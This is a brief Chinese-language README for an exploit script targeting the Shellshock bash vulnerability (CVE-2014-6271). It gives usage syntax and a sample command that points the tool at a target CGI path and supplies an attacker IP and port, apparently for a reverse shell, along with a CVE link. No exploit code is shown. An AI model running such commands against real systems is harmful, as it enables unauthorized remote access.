该exploit利用了bash 1.14至4.3版本中存在的Shellshock漏洞(CVE-2014-6271)。
python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>
示例:
python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443
有关该漏洞的更多信息:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271